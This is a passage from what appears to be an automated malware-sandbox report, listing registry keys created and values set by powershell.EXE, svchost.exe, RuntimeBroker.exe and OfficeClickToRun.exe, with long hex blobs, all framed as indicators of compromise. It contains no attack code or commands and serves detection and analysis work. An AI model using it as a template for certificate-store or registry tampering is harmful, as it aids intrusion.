powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7a-42-9e-e0-ea-a2\WpadDecisionReason = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7a-42-9e-e0-ea-a2\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7a-42-9e-e0-ea-a2\WpadDecisionTime = 38c7fe8f3dc9db01 svchost.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000c942547b3dc9db01f074287c3dc9db01f074287c3dc9db01903709000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45aa2212000646337613534306335313065353166313566316535323334343437396130396234326161353837623165613032646665653839623037616239373865316631650000b20009000400efbeb45aa221b45aa2212e000000000000000000000000000000000000000000000000006de79300640063003700610035003400300063003500310030006500350031006600310035006600310065003500320033003400340034003700390061003000390062003400320061006100350038003700620031006500610030003200640066006500650038003900620030003700610062003900370038006500310066003100650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000010f0391000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64633761353430633531306535316631356631653532333434343739613039623432616135383762316561303264666565383962303761623937386531663165000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007862626872707a6f000000000000000020b5dd590422d84082839ad7ed2fcdb1ef2f2bb46927f011b50f6aa57399dcbe20b5dd590422d84082839ad7ed2fcdb1ef2f2bb46927f011b50f6aa57399dcbece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003300340033003900330036003500330033002d0031003200360032003600330034003900370038002d0031003800360033003800370032003800310032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a2211436000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = d216597c3dc9db01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = 947fe37b3dc9db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\156b72c5e65c061eb4663b015eec1f0fada4bdcb27c7635cfb0b5a948bf4cd48" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58318078e6a30ee7ec4597ee1fb7a40bfa94836468c204e06ef9029ba038d7e0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002c1c4d7b3dc9db01cb72477c3dc9db01cb72477c3dc9db011ade07000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45aa2212000353833313830373865366133306565376563343539376565316662376134306266613934383336343638633230346530366566393032396261303338643765300000b20009000400efbeb45aa221b45aa2212e0000000000000000000000000000000000000000000000000039378300350038003300310038003000370038006500360061003300300065006500370065006300340035003900370065006500310066006200370061003400300062006600610039003400380033003600340036003800630032003000340065003000360065006600390030003200390062006100300033003800640037006500300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000010f0391000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35383331383037386536613330656537656334353937656531666237613430626661393438333634363863323034653036656639303239626130333864376530000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007862626872707a6f000000000000000020b5dd590422d84082839ad7ed2fcdb1f02f2bb46927f011b50f6aa57399dcbe20b5dd590422d84082839ad7ed2fcdb1f02f2bb46927f011b50f6aa57399dcbece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003300340033003900330036003500330033002d0031003200360032003600330034003900370038002d0031003800360033003800370032003800310032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a2211436000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d19a1226-0174-486e- = f541f07a3dc9db01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bda18bd-8e1b-49b3- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bda18bd-8e1b-49b3- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- = 97c2fa7a3dc9db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58318078e6a30ee7ec4597ee1fb7a40bfa94836468c204e06ef9029ba038d7e0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\2dcfc67fe523e1f6f503602bbb5f955d40b381101dbfc4fdf0b856311a7e53a2" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000000f6d1d7b3dc9db01848ea07b3dc9db01848ea07b3dc9db01ee3809000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45aa2212000326463666336376665353233653166366635303336303262626235663935356434306233383131303164626663346664663062383536333131613765353361320000b20009000400efbeb45aa221b45aa2212e000000000000000000000000000000000000000000000000005cac9800320064006300660063003600370066006500350032003300650031006600360066003500300033003600300032006200620062003500660039003500350064003400300062003300380031003100300031006400620066006300340066006400660030006200380035003600330031003100610037006500350033006100320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000010f0391000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32646366633637666535323365316636663530333630326262623566393535643430623338313130316462666334666466306238353633313161376535336132000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007862626872707a6f000000000000000020b5dd590422d84082839ad7ed2fcdb1eb2f2bb46927f011b50f6aa57399dcbe20b5dd590422d84082839ad7ed2fcdb1eb2f2bb46927f011b50f6aa57399dcbece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003300340033003900330036003500330033002d0031003200360032003600330034003900370038002d0031003800360033003800370032003800310032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a2211436000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\156b72c5e65c061eb4663b015eec1f0fada4bdcb27c7635cfb0b5a948bf4cd48" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000009fe5f47a3dc9db019fe5f47a3dc9db019fe5f47a3dc9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45aa2212000643766306539616638633462633036623331373235313035373365636639353063663737353962643738306661643738643330346230336431363738623864660000b20009000400efbeb45aa221b45aa2212e0000000000000000000000000000000000000000000000000061228f00640037006600300065003900610066003800630034006200630030003600620033003100370032003500310030003500370033006500630066003900350030006300660037003700350039006200640037003800300066006100640037003800640033003000340062003000330064003100360037003800620038006400660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000010f0391000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64376630653961663863346263303662333137323531303537336563663935306366373735396264373830666164373864333034623033643136373862386466000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007862626872707a6f000000000000000020b5dd590422d84082839ad7ed2fcdb1e72f2bb46927f011b50f6aa57399dcbe20b5dd590422d84082839ad7ed2fcdb1e72f2bb46927f011b50f6aa57399dcbece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003300340033003900330036003500330033002d0031003200360032003600330034003900370038002d0031003800360033003800370032003800310032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a2211436000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eef5bb6d-1f3e-469a- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d19a1226-0174-486e- RuntimeBroker.exe Key created 